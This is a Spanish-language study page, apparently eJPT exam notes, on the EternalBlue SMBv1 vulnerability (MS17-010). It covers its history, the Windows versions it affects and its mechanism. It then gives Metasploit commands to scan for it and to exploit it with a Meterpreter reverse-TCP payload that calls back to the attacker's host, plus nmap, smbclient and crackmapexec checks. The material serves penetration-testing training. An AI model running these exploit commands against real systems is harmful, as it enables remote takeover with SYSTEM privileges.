> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/metodologias-de-evaluacion/evaluacion-de-vulnerabilidad/analisis-de-vulnerabilidades/eternalblue.md).

# EternalBlue

### 🧠 ¿Qué es EternalBlue?

**EternalBlue** es el nombre de un exploit que aprovecha una vulnerabilidad crítica en el protocolo SMBv1 de Microsoft Windows. Esta vulnerabilidad está catalogada como **MS17-010** y registrada como **CVE-2017-0144**.

* 📆 Descubierta por la **NSA (Agencia de Seguridad Nacional de EE.UU.)**.
* 🕵️‍♂️ Filtrada públicamente en 2017 por el grupo de hackers conocido como **Shadow Brokers**.
* 💣 Permite la **ejecución remota de código (RCE)** enviando paquetes SMB maliciosos a sistemas Windows vulnerables.
* 🌐 Facilita la **propagación lateral en redes**, permitiendo a un atacante comprometer múltiples sistemas sin intervención adicional.

***

### 🧨 Impacto y ataques famosos

El exploit **EternalBlue** fue utilizado como vector de ataque principal en:

* **WannaCry** (2017): Un ransomware global que afectó a más de 200,000 sistemas en 150 países en cuestión de horas.
* **NotPetya**: Otro ransomware que utilizó EternalBlue para propagarse rápidamente en redes corporativas.

Este exploit tuvo un impacto devastador en sistemas que no habían sido parcheados, permitiendo su uso incluso por atacantes sin habilidades avanzadas.

***

## 🖥️ Sistemas Afectados

La vulnerabilidad afecta a una amplia gama de versiones de Windows:

* Windows Vista
* Windows 7
* Windows Server 2008
* Windows 8.1
* Windows Server 2012
* Windows 10
* Windows Server 2016

> ⚠️ **Nota:** Aunque Microsoft lanzó el parche en marzo de 2017, **muchos sistemas aún siguen sin actualizar**.

***

## 🔬 Detalles técnicos

* **Vulnerabilidad en:** Protocolo SMBv1 (`tcp/445`)
* **Tipo de vulnerabilidad:** **Desbordamiento de búfer remoto**
* **Resultado:** Ejecución remota de código con permisos de **Sistema** (NT AUTHORITY\SYSTEM)
* **Mecanismo:** El atacante envía paquetes SMB especialmente diseñados que ejecutan código malicioso al ser interpretados por el servidor SMB vulnerable.

***

## 🛠️ Detección y Explotación con Metasploit

Metasploit Framework contiene los siguientes módulos relacionados con EternalBlue:

#### 🔍 1. **Verificación de vulnerabilidad**

```bash
use auxiliary/scanner/smb/smb_ms17_010
```

**Opciones comunes:**

```bash
set RHOSTS <IP o rango>
set THREADS 10
run
```

Este módulo escanea objetivos para verificar si son vulnerables a EternalBlue.

***

#### 💣 2. **Explotación directa**

```bash
use exploit/windows/smb/ms17_010_eternalblue
```

**Parámetros clave:**

```bash
set RHOST <IP del objetivo>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <tu IP>
run
```

💡 Si el exploit es exitoso, obtendrás una **session Meterpreter con privilegios SYSTEM**, lo cual te permite moverte lateralmente, capturar hashes, ejecutar payloads, etc.

***

### 🧰 Herramientas adicionales

* **nmap**: Para detectar SMBv1 activo

  ```bash
  nmap -p445 --script smb-vuln-ms17-010 <IP>
  ```
* **smbclient**: Comprobar acceso a recursos compartidos

  ```bash
  smbclient -L //<IP> -N
  ```
* **crackmapexec / netexec**: Auditoría rápida de SMB

  ```bash
  crackmapexec smb <IP> --check-vulns
  ```
